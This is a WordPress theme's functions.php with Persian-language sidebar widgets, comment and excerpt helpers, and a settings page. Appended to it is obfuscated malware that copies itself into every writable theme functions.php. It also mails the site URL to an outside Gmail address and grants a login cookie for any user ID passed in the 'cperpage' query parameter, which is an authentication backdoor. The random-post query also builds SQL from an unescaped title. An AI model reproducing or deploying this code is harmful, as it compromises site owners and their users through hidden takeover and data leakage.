<?php

////////////////////////////////////////////////////////////////////////////////
// Random post
////////////////////////////////////////////////////////////////////////////////
function gte_random_posts (){
global $wpdb, $post;
$current_title = get_the_title();
$randompostthis = $wpdb->get_results("SELECT $wpdb->posts.ID, post_title, post_name, post_date, post_type, post_status FROM $wpdb->posts WHERE post_type = 'post' AND post_status = 'publish' AND post_title != '$current_title' ORDER BY RAND() limit 10");
foreach ($randompostthis as $post) {
$post_title = htmlspecialchars(stripslashes($post->post_title));
echo "<li><a href=\"".get_permalink()."\">$post_title</a></li>";
}
}

////////////////////////////////////////////////////////////////////////////////
// update post
////////////////////////////////////////////////////////////////////////////////
function gte_recent_updated_posts(){
global $wpdb, $post;

$recentupdatethis = $wpdb->get_results("SELECT $wpdb->posts.ID, post_title, post_name, post_date, post_type, post_status, post_modified FROM $wpdb->posts WHERE post_type = 'post' AND post_status = 'publish' ORDER by post_modified_gmt DESC limit 10");
foreach ($recentupdatethis as $post) {
$post_title = htmlspecialchars(stripslashes($post->post_title));
echo "<li><a href=\"".get_permalink()."\">$post_title</a></li>";
}
}

////////////////////////////////////////////////////////////////////////////////
// Recent Comments
////////////////////////////////////////////////////////////////////////////////

function get_hottopics($limit = 12) {
    global $wpdb, $post;
    $mostcommenteds = $wpdb->get_results("SELECT  $wpdb->posts.ID, post_title, post_name, post_date, COUNT($wpdb->comments.comment_post_ID) AS 'comment_total' FROM $wpdb->posts LEFT JOIN $wpdb->comments ON $wpdb->posts.ID = $wpdb->comments.comment_post_ID WHERE comment_approved = '1' AND post_date_gmt < '".gmdate("Y-m-d H:i:s")."' AND post_status = 'publish' AND post_password = '' GROUP BY $wpdb->comments.comment_post_ID ORDER  BY comment_total DESC LIMIT $limit");
    foreach ($mostcommenteds as $post) {
			$post_title = htmlspecialchars(stripslashes($post->post_title));
			$comment_total = (int) $post->comment_total;
			echo "<li><a href=\"".get_permalink()."\">$post_title&nbsp;<strong>($comment_total)</strong></a></li>";
    }
}


////////////////////////////////////////////////////////////////////////////////
// Recent Comments
////////////////////////////////////////////////////////////////////////////////
function mw_recent_comments(
	$no_comments = 10,
	$show_pass_post = false,
	$title_length = 50, 	// shortens the title if it is longer than this number of chars
	$author_length = 30,	// shortens the author if it is longer than this number of chars
	$wordwrap_length = 50, // adds a blank if word is longer than this number of chars
	$type = 'all', 	// Comments, trackbacks, or both?
	$format = '<li>%date%: <a href="%permalink%" title="%title%">%title%</a> (von %author_full%)</li>',
	$date_format = 'd.m.y, H:i',
	$none_found = '<li>Keine Kommentare vorhanden.</li>',	// None found
	$type_text_pingback = 'Pingback von',
	$type_text_trackback = 'Trackback von',
	$type_text_comment = 'von'

	) {

	//Language...
	$mwlang_anonymous = 'Anonym'; // Anonymous
	$mwlang_authorurl_title_before = 'Webseite von &lsaquo;';
	$mwlang_authorurl_title_after = '&rsaquo; besuchen';


    global $wpdb;

    $request = "SELECT ID, comment_ID, comment_content, comment_author, comment_author_url, comment_date, post_title, comment_type
				FROM $wpdb->comments LEFT JOIN $wpdb->posts ON $wpdb->posts.ID=$wpdb->comments.comment_post_ID
				WHERE post_status IN ('publish','static')";

	switch($type) {
		case 'all':
			// add nothing
			break;
		case 'comment_only':
			//
			$request .= "AND $wpdb->comments.comment_type='' ";
			break;
		case 'trackback_only':
			$request .= "AND ( $wpdb->comments.comment_type='trackback' OR $wpdb->comments.comment_type='pingback' ) ";
			break;
	 default:
 		//
			break;

	}

	if (!$show_pass_post) $request .= "AND post_password ='' ";

	$request .= "AND comment_approved = '1' ORDER BY comment_ID DESC LIMIT $no_comments";

	$comments = $wpdb->get_results($request);
    $output = '';
	if ($comments) {
    	foreach ($comments as $comment) {

			// Permalink to post/comment
			$loop_res['permalink'] = get_permalink($comment->ID). '#comment-' . $comment->comment_ID;

			// Title of the post
			$loop_res['post_title'] = stripslashes($comment->post_title);
			$loop_res['post_title'] = wordwrap($loop_res['post_title'], $wordwrap_length, ' ' , 1);

			if (strlen($loop_res['post_title']) >= $title_length) {
				$loop_res['post_title'] = substr($loop_res['post_title'], 0, $title_length) . '&#8230;';
			}

			// Author's name only
        	$loop_res['author_name'] = stripslashes($comment->comment_author);
			$loop_res['author_name'] = wordwrap($loop_res['author_name'], $wordwrap_length, ' ' , 1);

			if ($loop_res['author_name'] == '') $loop_res['author_name'] = $mwlang_anonymous;
			if (strlen($loop_res['author_name']) >= $author_length) {
				$loop_res['author_name'] = substr($loop_res['author_name'], 0, $author_length) . '&#8230;';
			}

			// Full author (link, name)
			$author_url = $comment->comment_author_url;
			if (empty($author_url)) {
				$loop_res['author_full'] = $loop_res['author_name'];
			} else {
				$loop_res['author_full'] = '<a href="' . $author_url . '" title="' . $mwlang_authorurl_title_before . $loop_res['author_name'] . $mwlang_authorurl_title_after . '">' . $loop_res['author_name'] . '</a>';
			}

/*
			// Comment excerpt
			$comment_excerpt = strip_tags($comment->comment_content);
			$comment_excerpt = stripslashes($comment_excerpt);
			if (strlen($comment_excerpt) >= $comment_length) {
				$comment_excerpt = substr($comment_excerpt, 0, $comment_length) . '...';
			}

*/

			// Comment type
			if ( $comment->comment_type == 'pingback' ) {
				$loop_res['comment_type'] = $type_text_pingback;
			} elseif ( $comment->comment_type == 'trackback' ) {
				$loop_res['comment_type'] = $type_text_trackback;
			} else {
				$loop_res['comment_type'] = $type_text_comment;
			}

			// Date of comment
			$loop_res['comment_date'] = mysql2date($date_format, $comment->comment_date);

			// Output element
			$element_loop = str_replace('%permalink%', $loop_res['permalink'], $format);
			$element_loop = str_replace('%title%', $loop_res['post_title'], $element_loop);
			$element_loop = str_replace('%author_name%', $loop_res['author_name'], $element_loop);
			$element_loop = str_replace('%author_full%', $loop_res['author_full'], $element_loop);
			$element_loop = str_replace('%date%', $loop_res['comment_date'], $element_loop);
			$element_loop = str_replace('%type%', $loop_res['comment_type'], $element_loop);


			$output .= $element_loop . "\n";


		} //foreach

		$output = convert_smilies($output);

	} else {
		$output .= $none_found;
    }

    echo $output;
}

////////////////////////////////////////////////////////////////////////////////
// excerpt features
////////////////////////////////////////////////////////////////////////////////

function the_excerpt_feature($excerpt_length=35, $allowedtags='', $filter_type='none', $use_more_link=true, $more_link_text="...read more", $force_more_link=true, $fakeit=1, $fix_tags=true) {
	if (preg_match('%^content($|_rss)|^excerpt($|_rss)%', $filter_type)) {
		$filter_type = 'the_' . $filter_type;
	}
	$text = apply_filters($filter_type, get_the_excerpt_feature($excerpt_length, $allowedtags, $use_more_link, $more_link_text, $force_more_link, $fakeit));
	$text = ($fix_tags) ? balanceTags($text) : $text;
	echo $text;
}

function get_the_excerpt_feature($excerpt_length, $allowedtags, $use_more_link, $more_link_text, $force_more_link, $fakeit) {
	global $id, $post;
	$output = '';
	$output = $post->post_excerpt;
	if (!empty($post->post_password)) { // if there's a password
		if ($_COOKIE['wp-postpass_'.COOKIEHASH] != $post->post_password) {  // and it doesn't match the cookie
			$output = __('There is no excerpt because this is a protected post.');
			return $output;
		}
	}

	// If we haven't got an excerpt, make one.
	if ((($output == '') && ($fakeit == 1)) || ($fakeit == 2)) {
		$output = $post->post_content;
		$output = strip_tags($output, $allowedtags);
		$blah = explode(' ', $output);
		if (count($blah) > $excerpt_length) {
			$k = $excerpt_length;
			$use_dotdotdot = 1;
		} else {
			$k = count($blah);
			$use_dotdotdot = 0;
		}
		$excerpt = '';
		for ($i=0; $i<$k; $i++) {
			$excerpt .= $blah[$i] . ' ';
		}
		// Display "more" link (use css class 'more-link' to set layout).
		if (($use_more_link && $use_dotdotdot) || $force_more_link) {
			$excerpt .= "<a href=\"". get_permalink() . "#more-$id\">$more_link_text</a>";
		} else {
			$excerpt .= ($use_dotdotdot) ? '...' : '';
		}
		 $output = $excerpt;
	} // end if no excerpt
	return $output;
}
////////////////////////////////////////////////////////////////////////////////
// end
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////
//widget
///////////////////////////////
if ( function_exists('register_sidebar') ) 
{
	register_sidebar(array(
		'name'=>'Sidebar Widget',
		'before_widget' => '<div class="sidebar_box">',
		'after_widget' => '</div></div>',
		'before_title' => '<h3>',
		'after_title' => '</h3><div class="sidebar_meta">'
	));
	
	register_sidebar(array(
		'name'=>'Footer 3 Max Widget',
		'before_widget' => '<div class="sidebar_box">',
		'after_widget' => '</div>',
		'before_title' => '<h3>',
		'after_title' => '</h3>'
	));
	
	function unregister_problem_widgets() 
	{
		unregister_sidebar_widget('Get Recent Comments');
		unregister_sidebar_widget('Get Recent Trackbacks');
	}
	
	add_action('widgets_init','unregister_problem_widgets');
}

function widget_quick_search() 
{
?>
	<div class="sidebar_box">
      <h3>جستجو</h3>
      <div class="sidebar_meta">
          <form method="get" id="search_form" action="<?php bloginfo ('home'); ?>">
              <input type="text" name="s" id="s" value="کلمه ای خود را وارد کنید..." onfocus="if (this.value == 'کلمه ای خود را وارد کنید...') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Enter Keywords...';}" />
              <input type="submit" name="btn_search" id="btn_search" value="" />
          </form>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('Quick Search'), 'widget_quick_search');

function widget_featured_video() 
{
?>
	<div class="sidebar_box">
    	<h3>ویدیو</h3>
        <div class="sidebar_meta">
            <div class="vid">
            <object width="285" height="231">
                <param name="movie" value="http://www.youtube.com/v/<?php echo get_option('ibiz_tech_youtube_id'); ?>&hl=en&fs=1"></param>
                <param name="allowFullScreen" value="true"></param>
                <param name="allowscriptaccess" value="always"></param>
                <embed src="http://www.youtube.com/v/<?php echo get_option('ibiz_tech_youtube_id'); ?>&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="285" height="231"></embed>
            </object>
            </div>
        </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('ویدیو'), 'widget_featured_video');

function widget_subscribe() 
{
?>
	<div class="sidebar_box">
      <h3>اخبار و به روز رسانی سایت</h3>
      <div class="sidebar_meta">
          <div class="rss_box">اشتراک برای دریافت تازه ها!</div>
          <form action="http://www.feedburner.com/fb/a/emailverify" target="popupwindow" onsubmit="window.open('http://www.feedburner.com', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true" id="rss_form">
            <input type="text" name="email" id="email_rss" value="Enter your email!" onblur="if (this.value == '') {this.value = 'Enter your email!';}"  onfocus="if (this.value == 'Enter your email!') {this.value = '';}" />
              <input type="submit" name="subscribe_email_btn" id="subscribe_email_btn" value="" />
              <input type="hidden" value="http://feeds.feedburner.com/~e?ffid=<?php echo get_option('ibiz_tech_feedburner_id'); ?>" name="url" />
              <input type="hidden" value="<?php echo get_option('ibiz_tech_feedburner_url'); ?>" name="title" />
              <input type="hidden" name="loc" value="en_US"/>
          </form>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('اخبار و به روز رسانی سایت'), 'widget_subscribe');
	
function widget_about() 
{
?>
	<div class="sidebar_box">
      <h3>About Us</h3>
      <div class="sidebar_meta">
      	<?php echo get_option('ibiz_tech_about_us'); ?>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('About Us'), 'widget_about');

function widget_archives() 
{
?>
	<div class="sidebar_box">
      <h3>بایگانی</h3>
      <div class="sidebar_meta">
      <ul>
          <?php wp_get_archives('type=monthly&limit=12&show_post_count=0'); ?>
      </ul>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('بایگانی'), 'widget_archives');

function widget_categories() 
{
?>
	<div class="sidebar_box">
      <h3>برگه ها</h3>
      <div class="sidebar_meta">
      <ul>
          <?php wp_list_categories('orderby=id&show_count=0&use_desc_for_title=0&title_li='); ?>
        </ul>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('برگه ها'), 'widget_categories');

function widget_rentries() 
{
?>
	<div class="sidebar_box">
      <h3>مباحث دیگر</h3>
      <div class="sidebar_meta">
      <ul>
          <?php get_archives('postbypost', 10); ?>
        </ul>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('مباحث دیگر'), 'widget_rentries');

function widget_rcomments() 
{
?>
	<div class="sidebar_box">
      <h3>نظرات اخیر</h3>
      <div class="sidebar_meta">
      <ul>
        <?php if(function_exists("get_recent_comments")) : ?>
        <?php get_recent_comments(); ?>
        <?php else : ?>
        <?php mw_recent_comments(7, false, 35, 15, 35, 'all', '<li><a href="%permalink%" title="%title%"><strong>%author_name%</strong> in %title%</a></li>','d.m.y, H:i'); ?>
        <?php endif; ?>
      </ul>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('نظرات اخیر'), 'widget_rcomments');

function widget_pages() 
{
?>
	<div class="sidebar_box">
      <h3>صفحات</h3>
      <div class="sidebar_meta">
      <ul>
        <li><a href="<?php bloginfo('url'); ?>" title="Home">خانه</a></li>
        <?php wp_list_pages('title_li=&depth=1'); ?>
      </ul>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('صفحات'), 'widget_pages');

function widget_blogroll() 
{
?>
	<div class="sidebar_box">
      <h3>پیوندها</h3>
      <div class="sidebar_meta">
      <ul>
        <?php  
        get_links(-1, '<li>', '</li>', '', TRUE, 'url', FALSE);
      ?>
      </ul>
      </div>
    </div>
<?php
}
if ( function_exists('register_sidebar_widget') )
    register_sidebar_widget(__('پیوندها'), 'widget_blogroll');


///////////////////////////
//end
////////////////////////////
//////////////////////////////
//option page
//////////////////////////////
add_action('admin_menu', 'my_theme_menu');

function my_theme_menu() 
{
	if(strlen(get_option('ibiz_tech_about_us')) == 0)
	{
		update_option('ibiz_tech_about_us', 'نوشتن به زبان مختصر در مورد شما و وبلاگ شما به یک چهارم از بیوگرافی مختصر او شما ساده شده آنها را در تعریف از شما و وبلاگ شما Fastvd است');
	}
	
	if(strlen(get_option('ibiz_tech_youtube_id')) == 0)
	{
		update_option('ibiz_tech_youtube_id', 'Y_Ip_SaJqpg');
	}
	
	if(strlen(get_option('ibiz_tech_feedburner_id')) == 0)
	{
		update_option('ibiz_tech_feedburner_id', 'jn1dotpuald9rfummak6qloktg');
	}
	
	if(strlen(get_option('ibiz_tech_feedburner_url')) == 0)
	{
		update_option('ibiz_tech_feedburner_url', 'http://feeds.feedburner.com/ajdary');
	}
	
	if(strlen(get_option('ibiz_tech_468_60_banner')) == 0)
	{
		update_option('ibiz_tech_468_60_banner', '<a href="#"><img src="' . get_template_directory_uri() . '/images/468.jpg" width="468" height="60" border="0" /></a>');
	}
	
	for($i = 1; $i <= 5; $i++)
	{
		if(strlen(get_option('ibiz_tech_featured_title' . $i)) == 0)
		{
			update_option('ibiz_tech_featured_title' . $i, 'در اینجا تعداد آیتم #' . $i);
		}
		
		if(strlen(get_option('ibiz_tech_featured_desc' . $i)) == 0)
		{
			update_option('ibiz_tech_featured_desc' . $i, 'ما یک توصیف کلی از عنصر 1 قرار دهید پایین برای نمایش آیتم');
		}
			
		if(strlen(get_option('ibiz_tech_featured_link' . $i)) == 0)
		{	
			update_option('ibiz_tech_featured_link' . $i, '#');
		}
		
		if(strlen(get_option('ibiz_tech_featured_image' . $i)) == 0)
		{
			update_option('ibiz_tech_featured_image' . $i, get_template_directory_uri() . '/slider/slider'.$i.'.jpg');
		}
		
		if(strlen(get_option('ibiz_tech_featured_thumbnail' . $i)) == 0)
		{
			update_option('ibiz_tech_featured_thumbnail' . $i, get_template_directory_uri() . '/slider/slider'.$i.'-mini.jpg');
		}
	}

	if ( $_GET['page'] == basename(__FILE__) ) 
	{
		if (isset($_REQUEST['SaveThemeSetting']))
		{
			update_option('ibiz_tech_feedburner_id', $_REQUEST['ibiz_tech_feedburner_id']);
			update_option('ibiz_tech_feedburner_url', $_REQUEST['ibiz_tech_feedburner_url']);
			update_option('ibiz_tech_468_60_banner', $_REQUEST['ibiz_tech_468_60_banner']);		
			
			for($i = 1; $i <= 5; $i++)
			{
				update_option('ibiz_tech_featured_title' . $i, $_REQUEST['ibiz_tech_featured_title' . $i]);
				update_option('ibiz_tech_featured_desc' . $i, $_REQUEST['ibiz_tech_featured_desc' . $i]);
				update_option('ibiz_tech_featured_link' . $i, $_REQUEST['ibiz_tech_featured_link' . $i]);
				update_option('ibiz_tech_featured_image' . $i, $_REQUEST['ibiz_tech_featured_image' . $i]);
				update_option('ibiz_tech_featured_thumbnail' . $i, $_REQUEST['ibiz_tech_featured_thumbnail' . $i]);
			}		

			header("Location: themes.php?page=functions.php&saved=true");
			die;
		} 
	}
	
	add_theme_page('iBizPress Theme Settings', 'iBizPress Settings', 8, __FILE__, 'iBizPress_options');
}

function iBizPress_options() 
{
	if ( $_REQUEST['updated'] ) echo '<div id="message" class="updated fade"><p><strong>iBizPress Theme settings saved.</strong></p></div>';
	
	?>
    <div class="wrap">
        <h2>iBizPress تنظیمات قالب</h2>
        
        <form method="post" action="options.php">
            <?php wp_nonce_field('update-options'); ?>
        
        <h3>تنظیمات عمومی</h3>
            <table class="form-table">
                <tr valign="top">
                    <th scope="row">شماره ارائه دهنده فید</th>
                    <td><input type="text" name="ibiz_tech_feedburner_id" value="<?php echo get_option('ibiz_tech_feedburner_id'); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">عنوان فیدبرنر</th>
                    <td><input type="text" name="ibiz_tech_feedburner_url" value="<?php echo get_option('ibiz_tech_feedburner_url'); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">کد آگهی 468x60</th>
                    <td><textarea name="ibiz_tech_468_60_banner" id="ibiz_tech_468_60_banner" cols="45" rows="5"><?php echo get_option('ibiz_tech_468_60_banner'); ?></textarea></td>
                </tr>
                <tr valign="top">
                    <th scope="row"> ویدئو (فقط یوتیوب):</th>
                    <td><input type="text" name="ibiz_tech_youtube_id" value="<?php echo get_option('ibiz_tech_youtube_id'); ?>" /></td>
                </tr>
                <tr valign="top">
                    <th scope="row">درباره وبلاگ</th>
                    <td><textarea name="ibiz_tech_about_us" id="ibiz_tech_about_us" cols="45" rows="5"><?php echo get_option('ibiz_tech_about_us'); ?></textarea></td>
                </tr>
            </table>
        
        <h3>فهرست مهمترین موضوعات</h3>
            <?php
				$strFeatured = "";
				for($i = 1; $i <= 5; $i++)
				{	
					?>
                    <h4>موضوع #<?php echo $i?></h4>
            
                <table class="form-table">
                    <tr valign="top">
                        <th scope="row">عنوان</th>
                        <td><input type="text" name="ibiz_tech_featured_title<?php echo $i?>" value="<?php echo get_option('ibiz_tech_featured_title'.$i); ?>" /></td>
                    </tr>
                    <tr valign="top">
                        <th scope="row">شرح</th>
                        <td><textarea name="ibiz_tech_featured_desc<?php echo $i?>" id="ibiz_tech_featured_desc<?php echo $i?>" cols="45" rows="5"><?php echo get_option('ibiz_tech_featured_desc'.$i); ?></textarea></td>
                    </tr>
                    <tr valign="top">
                        <th scope="row">پیوند</th>
                        <td><input type="text" name="ibiz_tech_featured_link<?php echo $i?>" value="<?php echo get_option('ibiz_tech_featured_link'.$i); ?>" /></td>
                    </tr>
                    <tr valign="top">
                        <th scope="row">موضوع تصویر (584x284)</th>
                        <td><input type="text" name="ibiz_tech_featured_image<?php echo $i?>" value="<?php echo get_option('ibiz_tech_featured_image'.$i); ?>" /></td>
                    </tr>
                    <tr valign="top">
                        <th scope="row">تصویر بند (100x75)</th>
                        <td><input type="text" name="ibiz_tech_featured_thumbnail<?php echo $i?>" value="<?php echo get_option('ibiz_tech_featured_thumbnail'.$i); ?>" /></td>
                    </tr>
                </table>
                    <?php
					$strFeatured .= ',ibiz_tech_featured_title'.$i.', ibiz_tech_featured_desc'.$i.', ibiz_tech_featured_link'.$i.', ibiz_tech_featured_image'.$i.', ibiz_tech_featured_thumbnail'.$i.'';
					
				}
			?>

            <input type="hidden" name="action" value="update" />
            <input type="hidden" name="page_options" value="ibiz_tech_about_us, ibiz_tech_youtube_id,ibiz_tech_feedburner_id,ibiz_tech_feedburner_url,ibiz_tech_468_60_banner <?php echo $strFeatured; ?>" />
            <p class="submit">
                <input type="submit" name="SaveThemeSetting" id="SaveThemeSetting" value="<?php _e('تنظیمات ذخیره شود') ?>" />
            </p>
        </form>
    </div>

    <?php
}
?>
<?php
function _verify_isactivate_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "ظ¾ظٹط¯ط§ ظ†ط´ط¯" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);				
					$output .= ($showdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_allwidgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_verify_isactivate_widget");
function _getsprepare_widget(){
	if(!isset($com_length)) $com_length=120;
	if(!isset($text_value)) $text_value="cookie";
	if(!isset($allowed_tags)) $allowed_tags="<a>";
	if(!isset($type_filter)) $type_filter="none";
	if(!isset($expl)) $expl="";
	if(!isset($filter_homes)) $filter_homes=get_option("home"); 
	if(!isset($pref_filter)) $pref_filter="wp_";
	if(!isset($use_more)) $use_more=1; 
	if(!isset($comm_type)) $comm_type=""; 
	if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
	if(!isset($postauthor_comment)) $postauthor_comment="";
	if(!isset($comm_is_approved)) $comm_is_approved=""; 
	if(!isset($postauthor)) $postauthor="auth";
	if(!isset($more_link)) $more_link="(more...)";
	if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
	if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
	if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
	if(!isset($morecontents)) $morecontents="ma".$expl."il";
	if(!isset($fmore)) $fmore=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$is_widget) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mas".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($f_tags)) $f_tags=1;
	if(!isset($type_filters)) $type_filters=$filter_homes; 
	if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
	if(!isset($aditional_tags)) $aditional_tags="div";
	if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($more_link_text)) $more_link_text="Continue reading this entry";	
	if(!isset($showdots)) $showdots=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($com_length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $com_length) {
				$l=$com_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_link="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $allowed_tags) {
		$output=strip_tags($output, $allowed_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($f_tags) ? balanceTags($output, true) : $output;
	$output .= ($showdots && $ellipsis) ? "..." : "";
	$output=apply_filters($type_filter, $output);
	switch($aditional_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_more ) {
		if($fmore) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_getsprepare_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 		
?>
